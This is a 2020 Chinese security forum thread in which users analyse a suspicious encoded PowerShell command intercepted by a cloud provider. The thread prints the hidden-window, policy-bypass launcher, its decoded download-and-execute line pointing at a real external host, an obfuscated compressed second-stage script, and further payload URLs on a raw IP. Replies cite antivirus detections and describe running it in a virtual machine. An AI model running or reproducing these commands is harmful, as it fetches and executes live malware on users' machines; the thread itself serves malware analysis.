高度可疑powershell脚本

显示全部楼层 · 发表于 2020-12-9 10:17:13

阿里云拦截到的一段sql注入攻击？

"C:\Windows\system32\cmd.exe" /c cmd /c powershell.exe -exec bypass -nop -w hidden -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAGYAZgAtAGUAbQBtAGUAcgBzAGQAbwByAGYALQBrAGwAYQBnAGUAbgBmAHUAcgB0AC4AYQB0AC8AZABhAHQAYQAvAHMAdABhAHIAdAAuAHAAcwAxACIAKQApAA==

base64解码出来是
iex ((New-Object System.Net.WebClient).DownloadString("http://ff-emmersdorf-klagenfurt.at/data/start.ps1"))
看了一下是一条下载脚本的命令，访问了一下http，内容就看不懂了，
有大佬可以帮忙看看这段脚本最终会导致什么结果吗

显示全部楼层 · 发表于 2020-12-9 10:18:59

链接的内容，是否危险未知

(NEW-OBJEcT SYstEm.IO.stReAmREaDer((NEW-OBJEcT Io.CompRESSioN.DeflATEstream([SySTEm.io.MEmOryStrEAM][coNveRt]::frombase64StRIng('jVjpb9pIFP8eKf/D7KHFqDFgMFek/RAR0qAtSQS01W4URa4ZEjfGdm1TGrH87/t7c/iCdovieI43b959mBnGr7t+f79r7XdtvAaD/a6Dcdfe73o0t/a7fhtjzDs0xl4HoHh6eDr09LCM95COYdwGmA1wC6jaQ6zh6XexTw/BA52NZ4hngDmBEhhNCQQo8GcRJKY2sAzocjx9woy1PsYDHLFAYA+3DugIocDcpofgMG8Dto3zNAQYsUPQeFu4rA0shAy7NhAMiCQc7OFAn9ggrjHvAsYCqE0YsNcl1gkxYIYkJcBZmJPg8BAG7HTxpg28LOKGxIZ7O0QlIcHc7ux/NVc1Lw6DNQ/Sh/Pz2/kHHideGDQ+8PXL8A0eMT098W96Uex99Xz+xNmfao/dfwpD/8Ew7uevScrXjTl3N7GXvjYUwF3sBa4XOX7joxcswy2Wame120+fuZsydeaGp42P/NPI9zj2xDGTf2HzrXUxvezZeNfZ7vSE4ReERAMzNzEg43SjbommV+Fn56tDx3mC/2tNPAPZgbPmV6C7hELtA5M/WbI1ziyd1AGeqefGYRKu0hznebO5Wpl8vYZo1LllGK/MF9954sFqE6cNJ23qHaBpxm7U9NZRDh8GTsobwOWulw3+jRN3TZcl7nPqJC8Jay5uWOVyKbAEo1EYpHHoLwDJmvEmwFlmfnS8lJk34Q3fSkjJnse/adYN4wYXsj/pruc0jYpsHKFfEP70HCYpEYgzEiH9CkKU6J6AeGth2Ynd57m6kKg6ojdNDn5qCBXIEbAI6SdaTF/8x2xzCDU9dtqnJ3vGfQ3AvZVRskTTCQiLogtyLxJPat2qhTozw5g4MRSqBU9S885Jn+kgAE1vSduPDVBkQuQrT9OxPsf6yvETXHcVxq6ypL18GdCAmVs0iXyeOjFwx6HLk4SRbbE5/oNc/K/AVzwgSOuNy3Ab+KGzVPeT2I35FkcTJngXaCeXglAFM45jbWnxhZvCY9kcx4LUfyXr8YINz9UJ8gQwMB6oWzGVEAcXgbbp8TfuFl2G6MCrQCAzyUIO3U2ByMlRgSmIQzmojUwcSg5qWZg0OHBi3JdiIJdzrxFKYFMebDCBLp4AqM5m2+915NBWsi9YDHzMyyQQbufpK9i89pZLHkhGJsHX8IWb429RDIWQzI2MN3WOWMxo01KV4szlqGB9LUeKbXQIUWHGWj3t0CBpdC540aomli6Phy3BBM4SH835ggxPcD4B9SkCNGL9W56ONnGMuVHPhP0Uh5sogV05qftMpwRVeMPbFQxpHmjPBGfkPGCCB1/P1bYTRUdCaVkvWucV9Whb0OrZkHrId+u73HrXL0svltdqguj249eCQuH88njZL3PKxVmAKseiWHIImV0GwIq70lESug41Wb7SP5KjOi9vhBOTpQm7nqdIkk9GHqWtQbdhtRq9QcOy+03papTaROpTaFTeShKEzCiLlKcnIt7WGSJYPL7zndGYGffutTN7sKzhGznqd9Vg2Kqfqc22jSMzfudfjMZkijc9mamlNevg+78R6zgr3U7DGg7BUruZuHHTakSJJcSUpSzhODqNmLhX0dXpZVQxYoREjwT2ousEqxRkRKLgkL2an2jZQ+A4RsakXU2GKeHkd46OCsnimYY4MCFtkyBJBLHOGPUHed19Ith8UFjkomRGJzvyjL1SiEfap1hbzcFZxBapWM2qGTkKUycNdUgq5WSdTkupuQgvBEWOpTzjNnZcn0u3kCg2FEFhEq032kosbRPDdkH2uEYGIr3ZY2XN0OKg86Zqa/ZQo+vY9de/138wg63aSEwfzt3baRKN3Xv7zOqetbsP5udbqtx07j80I7WVOUZu/AVjgsy1DsgYdA5fGb9Uy4alCgCihIFohbBwc2rOfc4j1m4BY1a8KMPIZXk04Oah5reDCKJi9/8Fbe1rP5OAdGLAVaDtx6kvqQbVUmV2vJZRnq5zwxGHJ7tT28XUDGr++oetwpg7yCK7YukRRsXCSCRveNgR10KEO1OLd9Jey2aP/dzqASBCW5/sThenPPf73OFLqYAymDAFJuorRv/yYhoTLQOK8CVl/ISY82SmdUvhK+NeVwiqITAv4qcNdWHvtM0mabFL0ItoFljThWBTnncNGtex5kFHGd1DUDwshWyiKo9MEvqHTYIvWWE7US6LEloV/n6W3QpRZ6p8RybxzOhkJa+pSxpT5zMKdNNPmdWSCZQI+3Ed8R3p42DJ0Mj1PV3Vf6+cF27AtOK19o4UFZQflirkiAC/2gSy5C7VdwqBMv6I6lRmnOKwikWibUGcUXAIN8W0JaVjlJqUcglRtGwZOIlEbSaHgUn3Pz+jMcmsjp2EiZoFw5CpM0zgdPc4ptNwtRxQByuFO4K5rvt+qhf1FeFnFTqpEUq+UFelqrsiAIniUfb4qnNEy8gOesalChoU80lIQqsqFmrZy6I3yw+V3pbU51cuVyqRnb9s+ZcCqF5MJap5ulIL2nllKNNFULVj13r9jrDUtvjwEEduqaXLejJyi62lrzAts2t22mbXVgu2JFSxDGIUV3ez29F4Pr+dPV7MRteTxXi0eD8bk+EXTF99VqlYu3Yszft9lNX+lcB/GPwny2JhRUr5peQRlD2ERjFQaYKUX9GYTpFHPiah/8kixBbp6uMzj7nKftIa4o1IwUdzL/3oG4xAsVbtdJ6kIsrIrdZ5q4X2a8TCwEW4vnzPusPh0GbN2YShL7vC4B27nry9HqNF0zqcvWfzv+eL8TT/zpP13vJ7j/jClTcamJJUNIxw75zvsofX6vUGOoN3jsuNGioxnP29li+hknumAq5FBZwc9dWo20cplyxm3s3bB7nSGRZwobgDrn9r9X8ZFXm/ixIvnM6j8QglXttWJZ4X1Gr1/wA=' ), [sYSteM.io.ComPREssIOn.CompreSSiONMODE]::dEcompREsS ) ) ,[tExt.ENCoDiNG]::ASCII) ).readtoEND() | . ((gEt-VaRiABlE '*MdR*').NAme[3,11,2]-joiN'')

显示全部楼层 · 发表于 2020-12-9 10:22:41

本帖最后由 k2132 于 2020-12-9 10:26 编辑

360 kill 火绒 kill 微点kill

显示全部楼层 · 发表于 2020-12-9 10:31:21

本帖最后由 foxbaby213 于 2020-12-9 10:32 编辑

虚拟机运行了一下，火绒报毒了，但是即使信任之后powershell好像也运行不了这个脚本啊

显示全部楼层 · 发表于 2020-12-9 10:42:17

毒霸系统保护拦截

显示全部楼层 · 发表于 2020-12-9 11:00:55

ESET

PowerShell/Kryptik.Q 特洛伊木马 - 已通过删除清除 [1]

显示全部楼层 · 发表于 2020-12-9 11:06:12

foxbaby213 发表于 2020-12-9 10:31
虚拟机运行了一下，火绒报毒了，但是即使信任之后powershell好像也运行不了这个脚本啊

你powershell的执行策略改一下就可以运行

显示全部楼层 · 发表于 2020-12-9 11:13:01

喀反发表于 2020-12-9 11:06
你powershell的执行策略改一下就可以运行

哦哦我改了一下，执行起来了，看下结果

阻止之后的代码报错

这玩意会不会导致虚拟机逃逸啊，不会的话我就允许让他跑起来玩一玩了w

显示全部楼层 · 发表于 2020-12-9 11:45:37

foxbaby213 发表于 2020-12-9 11:13
哦哦我改了一下，执行起来了，看下结果

阻止之后的代码报错

很少有病毒木马能逃逸虚拟机的，不用过多担心。
这咋下载，搞半天不知道怎么下载

显示全部楼层 · 发表于 2020-12-9 11:55:37

喀反发表于 2020-12-9 11:45
很少有病毒木马能逃逸虚拟机的，不用过多担心。
这咋下载，搞半天不知道怎么下载

直接cmd运行powershell然后执行下载下来的那个.ps1文件，火绒阻止之后报错里面就会提示访问几个路径失败，我下载下来单独看了下，

http://185.153.199.102/1.7z

http://185.153.199.102/7z.exe

http://185.153.199.102/7z.dll

一个压缩包，还提供了解压工具

[可疑文件] 高度可疑powershell脚本

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源